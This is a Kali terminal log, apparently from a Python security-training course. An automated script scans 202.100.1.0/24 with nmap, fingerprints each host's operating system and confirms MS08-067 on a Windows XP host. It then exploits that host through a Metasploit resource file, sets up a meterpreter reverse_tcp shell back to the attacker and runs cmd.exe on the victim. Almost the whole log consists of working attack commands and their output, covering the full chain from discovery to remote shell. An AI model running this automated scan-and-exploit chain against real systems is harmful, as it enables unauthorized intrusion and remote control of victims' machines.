root@kali:~/PyQYT/Practice_Lab# ./Hacker_Auto.py 202.100.1.0/24
=============================================================================
第一步:开始NMAP网络Ping扫描以发现活动主机
发现网络中的活动主机:
202.100.1.101 is UP
202.100.1.200 is UP
202.100.1.201 is UP
=============================================================================
第二步:判断活动主机的操作系统
活动主机操作系统判断结果:
202.100.1.101 操作系统为: ['Linux 3.8 - 3.19']
202.100.1.200 操作系统为: ['Microsoft Windows 2000 SP0 - SP4', 'Windows XP SP0 - SP1']
202.100.1.201 操作系统为: ['Microsoft Windows 7 SP0 - SP1', 'Windows Server 2008 SP1', 'Windows 8', 'Windows 8.1 Update 1']
=============================================================================
第三步:开始对可疑系统(Windows)进行针对性的MS08_067确认
被怀疑存在MS08_067漏洞的主机如下:
202.100.1.200 被怀疑可能存在MS08_067漏洞,并且开始进行确认
202.100.1.200 被确认存在MS08_067漏洞!!!
202.100.1.201 被怀疑可能存在MS08_067漏洞,并且开始进行确认
202.100.1.201 被确认不存在MS08_067漏洞
=============================================================================
第四步:开始使用Metasploit对存在MS08_067漏洞的主机发起攻击
开始发起对主机202.100.1.200的攻击!

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing qytang.rc for ERB directives.
resource (qytang.rc)> use exploit/multi/handler
resource (qytang.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (qytang.rc)> set LPORT 5092
LPORT => 5092
resource (qytang.rc)> set LHOST 202.100.1.101
LHOST => 202.100.1.101
resource (qytang.rc)> exploit -j -z
[*] Exploit running as background job.
resource (qytang.rc)> setg DisablePayLoadHandler 1
DisablePayLoadHandler => 1
resource (qytang.rc)> use exploit/windows/smb/ms08_067_netapi
resource (qytang.rc)> set RHOST 202.100.1.200
RHOST => 202.100.1.200
resource (qytang.rc)> set payload windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 202.100.1.101:5092
payload => windows/meterpreter/reverse_tcp
[*] Starting the payload handler...
resource (qytang.rc)> set LPORT 5092
LPORT => 5092
resource (qytang.rc)> set LHOST 202.100.1.101
LHOST => 202.100.1.101
resource (qytang.rc)> exploit -j -z
[*] Exploit running as background job.
resource (qytang.rc)> sleep 10
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 202.100.1.200
[*] Meterpreter session 1 opened (202.100.1.101:5092 -> 202.100.1.200:1032) at 2016-05-20 18:04:41 +0800
resource (qytang.rc)> sessions -i 1
[*] Starting interaction with 1...
meterpreter > execute -i -f cmd.exe
Process 1680 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.100.1.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.100.1.10

C:\WINDOWS\system32>
For more study materials and question banks, visit the 乾颐堂 (Qianyitang) official website:
You are welcome to visit my open-source project PyQYT:
https://github.com/collinsctk/PyQYT